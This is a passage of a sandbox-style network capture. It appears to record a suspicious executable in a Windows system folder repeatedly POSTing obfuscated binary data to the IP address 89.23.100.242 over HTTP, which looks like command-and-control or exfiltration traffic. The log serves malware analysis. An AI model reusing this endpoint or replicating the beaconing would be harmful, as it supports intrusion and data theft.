Jan 10, 2025 07:58:42.439197063 CET | 2544 | OUT | Data Raw: 59 55 46 55 5e 57 56 56 58 5b 57 56 50 5c 5b 57 55 56 5e 58 54 5e 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
  Data Ascii: YUFU^WVVX[WVP\[WUV^XT^Q]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,1<.>>&Z-:2?[$(+4]5#Q(3*<*F%&*'_!/Y.
Jan 10, 2025 07:58:42.826157093 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:42.977946997 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Fri, 10 Jan 2025 06:58:42 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 50077 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:43.105462074 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
  Host: 89.23.100.242
  Content-Length: 2544
  Expect: 100-continue
  Connection: Keep-Alive
Jan 10, 2025 07:58:43.454941034 CET | 2544 | OUT | Data Raw: 59 54 43 56 5b 5d 53 57 58 5b 57 56 50 53 5b 52 55 54 5e 52 54 59 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
  Data Ascii: YTCV[]SWX[WVPS[RUT^RTYQSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/'X>>><5<,:>-')(#!'<3>?G1X&:'_!/Y.
Jan 10, 2025 07:58:43.857805967 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:43.984622955 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Fri, 10 Jan 2025 06:58:43 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 50087 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:44.113409042 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
  Host: 89.23.100.242
  Content-Length: 2544
  Expect: 100-continue
  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.4 | 50088 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:44.258855104 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
  Host: 89.23.100.242
  Content-Length: 2024
  Expect: 100-continue
  Connection: Keep-Alive
Jan 10, 2025 07:58:44.610959053 CET | 2024 | OUT | Data Raw: 5c 52 46 54 5e 5a 56 56 58 5b 57 56 50 5b 5b 56 55 5c 5e 53 54 50 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
  Data Ascii: \RFT^ZVVX[WVP[[VU\^STPQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'810<[2+&+/.?,++75$<3(+<)&$0'_!/Y.=
Jan 10, 2025 07:58:45.209795952 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:45.209866047 CET | 349 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Fri, 10 Jan 2025 06:58:44 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 39 38 0d 0a 0f 1e 39 1f 37 2b 3c 1f 26 3f 35 56 2d 3f 39 57 2b 0e 37 06 29 3e 34 01 3e 0d 28 0c 2d 06 34 0f 21 28 21 58 2b 0c 3d 0a 26 2c 24 1e 25 37 21 59 0c 13 25 03 28 39 2d 51 3d 3a 0a 5b 2b 1f 2d 19 24 33 20 03 24 2d 21 18 37 06 38 5c 3e 2a 3d 19 2a 22 3a 0e 2e 07 05 03 28 3c 2c 1e 27 36 2a 57 0c 1f 26 10 35 1c 25 50 36 1c 3a 5c 30 2b 3b 54 24 16 06 55 32 11 3f 13 37 03 20 03 2c 2a 3b 00 22 00 0e 11 28 3e 25 0a 35 0c 3c 52 29 3c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 9897+<&?5V-?9W+7)>4>(-4!(!X+=&,$%7!Y%(9-Q=:[+-$3 $-!78\>*=*":.(<,'6*W&5%P6:\0+;T$U2?7 ,*;"(>%5<R)< Q""P0]Q0
Jan 10, 2025 07:58:45.209893942 CET | 349 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Fri, 10 Jan 2025 06:58:44 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 39 38 0d 0a 0f 1e 39 1f 37 2b 3c 1f 26 3f 35 56 2d 3f 39 57 2b 0e 37 06 29 3e 34 01 3e 0d 28 0c 2d 06 34 0f 21 28 21 58 2b 0c 3d 0a 26 2c 24 1e 25 37 21 59 0c 13 25 03 28 39 2d 51 3d 3a 0a 5b 2b 1f 2d 19 24 33 20 03 24 2d 21 18 37 06 38 5c 3e 2a 3d 19 2a 22 3a 0e 2e 07 05 03 28 3c 2c 1e 27 36 2a 57 0c 1f 26 10 35 1c 25 50 36 1c 3a 5c 30 2b 3b 54 24 16 06 55 32 11 3f 13 37 03 20 03 2c 2a 3b 00 22 00 0e 11 28 3e 25 0a 35 0c 3c 52 29 3c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 9897+<&?5V-?9W+7)>4>(-4!(!X+=&,$%7!Y%(9-Q=:[+-$3 $-!78\>*=*":.(<,'6*W&5%P6:\0+;T$U2?7 ,*;"(>%5<R)< Q""P0]Q0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.4 | 50089 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:44.380027056 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
  Host: 89.23.100.242
  Content-Length: 2544
  Expect: 100-continue
  Connection: Keep-Alive
Jan 10, 2025 07:58:44.735991001 CET | 2544 | OUT | Data Raw: 5c 51 43 55 5b 5e 56 5f 58 5b 57 56 50 5a 5b 5b 55 51 5e 5b 54 5b 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
  Data Ascii: \QCU[^V_X[WVPZ[[UQ^[T[Q]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C823Z(1+<-:"<4+^+"T<3Y+?"C1-8&*'_!/Y.-
Jan 10, 2025 07:58:45.209836006 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:45.294086933 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Fri, 10 Jan 2025 06:58:45 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                83192.168.2.45009089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:45.442540884 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
Timestamp: Jan 10, 2025 07:58:45.798490047 CET | Bytes transferred: 2544 | Direction: OUT | Data Raw: (hex dump of request body omitted)
Timestamp: Jan 10, 2025 07:58:46.219194889 CET | Bytes transferred: 25 | Direction: IN | Data:
    HTTP/1.1 100 Continue
Timestamp: Jan 10, 2025 07:58:46.389796019 CET | Bytes transferred: 200 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID: 84 | Source IP: 192.168.2.4 | Source Port: 50091 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp: Jan 10, 2025 07:58:46.524138927 CET | Bytes transferred: 531 | Direction: OUT | Data:
    POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Timestamp: Jan 10, 2025 07:58:46.876611948 CET | Bytes transferred: 2544 | Direction: OUT | Data Raw: (hex dump of request body omitted)
Timestamp: Jan 10, 2025 07:58:47.362629890 CET | Bytes transferred: 25 | Direction: IN | Data:
    HTTP/1.1 100 Continue
Timestamp: Jan 10, 2025 07:58:47.500628948 CET | Bytes transferred: 200 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID: 85 | Source IP: 192.168.2.4 | Source Port: 50092 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp: Jan 10, 2025 07:58:47.628360987 CET | Bytes transferred: 531 | Direction: OUT | Data:
    POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Timestamp: Jan 10, 2025 07:58:47.986047029 CET | Bytes transferred: 2544 | Direction: OUT | Data Raw: (hex dump of request body omitted)
Timestamp: Jan 10, 2025 07:58:48.364654064 CET | Bytes transferred: 25 | Direction: IN | Data:
    HTTP/1.1 100 Continue
Timestamp: Jan 10, 2025 07:58:48.516638994 CET | Bytes transferred: 200 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:48 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID: 86 | Source IP: 192.168.2.4 | Source Port: 50093 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp: Jan 10, 2025 07:58:48.643476963 CET | Bytes transferred: 531 | Direction: OUT | Data:
    POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Timestamp: Jan 10, 2025 07:58:49.001590014 CET | Bytes transferred: 2544 | Direction: OUT | Data Raw: (hex dump of request body omitted)
Timestamp: Jan 10, 2025 07:58:49.397394896 CET | Bytes transferred: 25 | Direction: IN | Data:
    HTTP/1.1 100 Continue
Timestamp: Jan 10, 2025 07:58:49.532780886 CET | Bytes transferred: 200 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID: 87 | Source IP: 192.168.2.4 | Source Port: 50094 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp: Jan 10, 2025 07:58:49.660655975 CET | Bytes transferred: 531 | Direction: OUT | Data:
    POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Timestamp: Jan 10, 2025 07:58:50.017247915 CET | Bytes transferred: 2544 | Direction: OUT | Data Raw: (hex dump of request body omitted)


Session ID: 88 | Source IP: 192.168.2.4 | Source Port: 50095 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp: Jan 10, 2025 07:58:50.226541996 CET | Bytes transferred: 531 | Direction: OUT | Data:
    POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2024
    Expect: 100-continue
    Connection: Keep-Alive
Timestamp: Jan 10, 2025 07:58:50.579921007 CET | Bytes transferred: 2024 | Direction: OUT | Data Raw: (hex dump of request body omitted)
Timestamp: Jan 10, 2025 07:58:50.990257025 CET | Bytes transferred: 25 | Direction: IN | Data:
    HTTP/1.1 100 Continue
Timestamp: Jan 10, 2025 07:58:51.142091990 CET | Bytes transferred: 349 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: (hex dump of chunked response body omitted)


Session ID: 89 | Source IP: 192.168.2.4 | Source Port: 50096 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp: Jan 10, 2025 07:58:50.347024918 CET | Bytes transferred: 531 | Direction: OUT | Data:
    POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Timestamp: Jan 10, 2025 07:58:50.704745054 CET | Bytes transferred: 2544 | Direction: OUT | Data Raw: (hex dump of request body omitted)
Timestamp: Jan 10, 2025 07:58:51.084093094 CET | Bytes transferred: 25 | Direction: IN | Data:
    HTTP/1.1 100 Continue
Timestamp: Jan 10, 2025 07:58:51.212939978 CET | Bytes transferred: 200 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:50 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID: 90 | Source IP: 192.168.2.4 | Source Port: 50097 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp: Jan 10, 2025 07:58:51.336992979 CET | Bytes transferred: 507 | Direction: OUT | Data:
    POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
Timestamp: Jan 10, 2025 07:58:51.689127922 CET | Bytes transferred: 2544 | Direction: OUT | Data Raw: (hex dump of request body omitted)
Timestamp: Jan 10, 2025 07:58:52.103879929 CET | Bytes transferred: 25 | Direction: IN | Data:
    HTTP/1.1 100 Continue
Timestamp: Jan 10, 2025 07:58:52.291888952 CET | Bytes transferred: 200 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID: 91 | Source IP: 192.168.2.4 | Source Port: 50098 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp: Jan 10, 2025 07:58:52.427025080 CET | Bytes transferred: 507 | Direction: OUT | Data:
    POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
Timestamp: Jan 10, 2025 07:58:52.782845974 CET | Bytes transferred: 2544 | Direction: OUT | Data Raw: (hex dump of request body omitted)
Timestamp: Jan 10, 2025 07:58:53.275991917 CET | Bytes transferred: 25 | Direction: IN | Data:
    HTTP/1.1 100 Continue
Timestamp: Jan 10, 2025 07:58:53.427634954 CET | Bytes transferred: 200 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:53 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID: 92 | Source IP: 192.168.2.4 | Source Port: 50099 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp: Jan 10, 2025 07:58:53.549983978 CET | Bytes transferred: 531 | Direction: OUT | Data:
    POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:53.907850027 CET2544OUTData Raw: 59 52 43 5e 5b 5a 56 56 58 5b 57 56 50 52 5b 5a 55 57 5e 5e 54 5b 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YRC^[ZVVX[WVPR[ZUW^^T[QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'D,]?[2+$Z,:"<>')8]5,+03),6G2=#&:'_!/Y.
                                                                                                Jan 10, 2025 07:58:54.290642977 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:54.429718971 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:54 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.4 | 50100 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:54.548875093 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:54.907955885 CET | 2544 | OUT | Data Raw: 5c 52 46 57 5b 5c 53 53 58 5b 57 56 50 5c 5b 5b 55 56 5e 5b 54 5d 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
